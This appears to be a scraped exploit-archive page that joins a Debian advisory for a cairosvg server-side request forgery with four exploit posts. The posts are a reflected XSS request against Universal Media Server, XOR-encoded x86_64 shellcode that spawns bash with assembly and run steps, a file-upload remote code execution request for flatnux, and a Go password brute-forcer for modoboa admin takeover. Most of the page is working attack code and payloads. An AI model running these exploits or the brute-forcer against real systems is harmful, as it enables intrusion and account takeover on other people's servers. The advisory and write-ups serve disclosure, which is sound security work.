RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeTvzxAAhrAcR/ZgJwe/4qeekO90f4YaCAoJhq7Fq4K6Wj5yM8dllX1IgTy7sweC  
G/GLe62O5snepEI6Fjfy3exkKieSYvsinGxUUcn3CjPYgpLfEDrRGhpWY1y0NPhQ  
NC6iFud2yJIfqI0Ns6h6rhq3F1Blp8iqBWqQiNdEAnZR+jqgqw/qtfa2GbsMLwI2  
so5EZBS3I2of6dCdvS71z8h2Mwf6AbsJh9f96BzlbnNZbGGGp46aIq/VtBUGwrtq  
CA8jrBNtsRT4sMsNp/qqbwLJwkSUxrOqALmJT35FGx9UnZCRld/UNonDpOM85Kia  
GdWE9aJ/A8p+i7vOivNserDBplDnWqug+NygYBmDUigwWfn2mqFIZvBbnp7lQp1z  
udNdTrvSnBSvLSnFUk97Qk3+oTLIO5YtmtXoHCDcGoKe6BAUbe9VYvHDNCNSDfD+  
vu2nv4cLGtI7SKNRN64B7d44z/sDK6o3ymGZEI+HT8dNFTA702m1AuDl/P/Zms7I  
2WKewbQBYrPbLOZE7sreyK8r84EAWR6o4VFAI/pkggckiFWcwdBVVsn0AV1WbtKo  
Z0R6DBFeyaYNrNh8TUDomJRySrV3sft48b5fLBNm6TQUzuTjbRLO0wYVXGywIU45  
aafJ+8bOP9EjhEF+erSIW7/dMm07hODtSL5QymPQlvmDmq7JM7g=XJMU  
-----END PGP SIGNATURE-----

Debian Security Advisory 5381-1

Debian Linux Security Advisory 5382-1 - It was reported that cairosvg, a SVG converter based on Cairo, can send requests to external hosts when processing specially crafted SVG files with external file resource loading. An attacker can take advantage of this flaw to perform a server-side request forgery or denial of service. Fetching of external files is disabled by default with this update.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5382-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 05, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cairosvgCVE ID         : CVE-2023-27586Debian Bug     : 1033295It was reported that cairosvg, a SVG converter based on Cairo, can sendrequests to external hosts when processing specially crafted SVG fileswith external file resource loading. An attacker can take advantage ofthis flaw to perform a server-side request forgery or denial of service.Fetching of external files is disabled by default with this update.For the stable distribution (bullseye), this problem has been fixed inversion 2.5.0-1.1+deb11u1.We recommend that you upgrade your cairosvg packages.For the detailed security status of cairosvg please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/cairosvgFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQt1clfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SHSA/+JRGHd5ccJTCZWYjtXDsq3tjP77dofbJW24Q+jEa22iQNkHHaW+k7jA+0DupIu6apNuA8WoGbBYEA24zG0c/XplIKYC7N0e+23wrX0pbamNyENIkWtFKSeY0UnYcNCSD+rL3GasVKiUOvdaWk7PZqxgIU1+ORgnvDVUHY2BB15cEVDKAvcwIrd71KkU6JbGdAoufek30UszsyMTs+ULp00uErgzq3jrxnJ5NCAnj8i7sI+DGY/aqEkOFEgZi7gIRDkK68VPMxQAUFCB7n/vIsqFrJTdwJ3xIhaZixEXgbLr4TBY1VhqixljNijSq2A72lTqotiKbXLiBy8l2vf+9T1au9qhImMViN3Sr6NDm3mjc/2wQv8ECopMiXMsbaJOjS/Fslbzc6jleK+xvhwkpwqbOYd9eyhX5FEEGdzHRJR093dy7Rp1t58QIkjOw4gS5psq6YEDtcTwyA7CAUZpZ0KGPiaM9+sY68iFsIa/b3HKnkGD+/Xp727CZLStSTYx/LOB/VSGOhxmSxQMpVJ9UMcFoCFfq+4xij1losWprs4nbEa/4CsPWWYuL/eWuMywMvev9adj55x6voruJ2eKxFFiQ+wR2JcdKXY5oXqzNAfjKLLHPjzq2co0OsIJ9x3kAM9eCct13Iq1gsz4tuj3zJgI4458cci5iMiRKjwdsClAM=vgG/-----END PGP SIGNATURE-----

Debian Security Advisory 5382-1

Universal Media Server version 13.2.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Universal Media Server 13.2.1 Cross Site Scripting # Google Dork: NA# Date: 01/04/2023# Exploit Author: Yehia Elghaly - Mrvar0x# Vendor Homepage: https://www.universalmediaserver.com/# Software Link: https://www.universalmediaserver.com/download/# Version: 13.2.1# Tested on: Windows 7 / 10# CVE: N/ASummary: Universal Media Server is a free DLNA, UPnP and HTTP/S Media Server.Support all major operating systems, with versions for Windows, Linux and macOS.Description: The attacker can able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.: Reflected XSS found on the follwoing paths GET /%3Cscript%3Ealert('XSSYF')%3C/script%3E HTTP/1.1Host: 172.16.110.132:9001User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1[Affected Component]//about/accounts/actions/logs/player/settings/shared/v1/api/about/|echo

Universal Media Server 13.2.1 Cross Site Scripting

71 bytes small Linux/x86_64 bash shellcode with XOR encoding.

    Exploit Title: Linux/x86_64 - bash shellcode with xor encodingDate: 05/02/2023Exploit Author: Jeenika AnadaniContact: https://twitter.com/cyber_jeeniCategory: ShellcodeArchitectue: Linux x86_64Shellcode Length: 71 Bytes-----------------------section .datasection .text  global _start_start:  ; set up argv and envp arrays for execve()  xor rax, rax  mov [rsp-8], rax  mov qword [rsp-16], 0x72613162 ; encrypted 'bash'  xor byte [rsp-16], 0x08  xor byte [rsp-15], 0x16  xor byte [rsp-14], 0x24  xor byte [rsp-13], 0x32  lea rdx, [rsp-16]  mov qword [rsp-24], rdx  mov qword [rsp-32], rdx  lea rdi, [rsp-32]  ; call execve()  xor eax, eax  mov al, 59  syscall  ; exit with status code 0  xor eax, eax  mov ebx, eax  mov al, 60  syscall-----------#### Explanation:This code uses XOR encryption to obscure the name of the program being executed, `"bash"`. The XOR encryption key is `0x08162432`, which is applied to each byte of the string. The decryption is performed just before calling `execve`, so the program name is passed in its original form.The rest of the code is the same as the previous example, making a system call to the `execve` function and then calling the `exit` syscall to terminate the process.---------### Compilation AND Execution:To run the x86_64 assembly code on a Linux system, you need to assemble it into an executable file and then run the file. Here are the steps:1.  Save the code to a file with a `.asm` extension, for example `bash.asm`.   2.  Assemble the code into an object file using an assembler, such as NASM:  `nasm -f elf64 -o bash.o bash.asm`The `-f elf64` option specifies that the output format should be ELF64 (Executable and Linkable Format), and the `-o` option specifies the name of the output file, `bash.o`.    3.  Link the object file to produce an executable file using the `ld` linker:  `ld -s -o bash bash.o`The `-s` option removes the symbol table from the output file to make it smaller, and the `-o` option specifies the name of the output file, `bash`.    4. Make the file executable:  `chmod +x bash`5. Finally, you can run the file:  `./bash`---------------------

Linux/x86_64 Bash Shellcode

flatnux version 2021-03.25 suffers from a remote code execution vulnerability.

    # Exploit Title: flatnux-2021-03.25 - Remote Code Execution (Authenticated)# Exploit Author: Ömer Hasan Durmuş# Vendor Homepage: https://en.altervista.org# Software Link: http://flatnux.altervista.org/flatnux.html# Version: 2021-03.25# Tested on: Windows/LinuxPOST/flatnux/filemanager.php?mode=t&filemanager_editor=ckeditor4&dir=misc/media/news&CKEditor=fckeditorsummary_en&CKEditorFuncNum=1&langCode=enHTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: multipart/form-data;boundary=---------------------------393526031113460918603940283286Content-Length: 413Origin: http://localhostConnection: closeReferer:http://localhost/flatnux/controlcenter.php?page___xdb_news=1&opt=fnc_ccnf_section_news&mod=news&mode=edit&pk___xdb_news=1&desc_=1&order___xdb_news=date&op___xdb_news=insnewCookie: fnuser=admin; secid=fe0d39d41d63bec72eda06bbc7942015; lang=en;ckCsrfToken=BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsbUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: iframeSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------393526031113460918603940283286Content-Disposition: form-data; name="upload"; filename="info.php"Content-Type: application/octet-stream<?php phpinfo(); ?>-----------------------------393526031113460918603940283286Content-Disposition: form-data; name="ckCsrfToken"BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb-----------------------------393526031113460918603940283286--

flatnux 2021-03.25 Remote Code Execution

modoboa version 2.0.4 suffers from an administrative takeover vulnerability.

    /* # Exploit Title: modoboa  2.0.4 - Admin TakeOver # Description: Authentication Bypass by Primary Weakness # Date: 02/10/2023# Software Link: https://github.com/modoboa/modoboa# Version: modoboa/modoboa prior to 2.0.4# Tested on: Arch Linux # Exploit Author: 7h3h4ckv157# CVE: CVE-2023-0777 */package mainimport (  "fmt"  "io/ioutil"  "net/http"  "os"  "strings"  "time")func main() {  fmt.Println("\n\t*** ADMIN TAKEOVER ***\n")  host := getInput("Enter the target host: ")  username := getInput("Enter the Admin's Name: ")  passwordFile := getInput("Provide the path for Password-Wordlist: ")  passwords, err := readLines(passwordFile)  if err != nil {    fmt.Println("Error reading password file:", err)    os.Exit(1)  }  for _, password := range passwords {    data := fmt.Sprintf("-----------------------------25524418606542250161357131552\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n%s\r\n-----------------------------25524418606542250161357131552\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n%s\r\n-----------------------------25524418606542250161357131552--\r\n\r\n", username, password)    headers := map[string]string{      "Host":           host,      "User-Agent":     "Anonymous",      "Accept":         "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",      "Accept-Language": "en-US,en;q=0.5",      "Accept-Encoding": "gzip, deflate",      "Content-Type":   "multipart/form-data; boundary=---------------------------25524418606542250161357131552",    }    resp, err := postRequest(fmt.Sprintf("https://%s/api/v2/token/", host), headers, data)    if err != nil {      fmt.Println("Error sending request:", err)      os.Exit(1)    }    if resp.StatusCode == 200 {      fmt.Printf("\n\tValid password Found: %s\n", password)      break    } else {      fmt.Printf("Invalid password: %s\n", password)    }    // Delay the next request to limit the requests per second    delay := time.Duration(1000000000/50) * time.Nanosecond    time.Sleep(delay)  }}// Read the lines from a file and return them as a slice of stringsfunc readLines(filename string) ([]string, error) {  content, err := ioutil.ReadFile(filename)  if err != nil {    return nil, err  }  return strings.Split(string(content), "\n"), nil}// Send a POST request with the given headers and datafunc postRequest(url string, headers map[string]string, data string) (*http.Response, error) {  req, err := http.NewRequest("POST", url, strings.NewReader(data))  if err != nil {    return nil, err  }  for key, value := range headers {    req.Header.Set(key, value)  }  client := &http.Client{}  resp, err := client.Do(req)  if err != nil {    return nil, err  }  return resp, nil}// Get user input and return the trimmed valuefunc getInput(prompt string) string {  fmt.Print(prompt)  var input string  fmt.Scanln(&input)  return strings.TrimSpace(input)}

Tag

#linux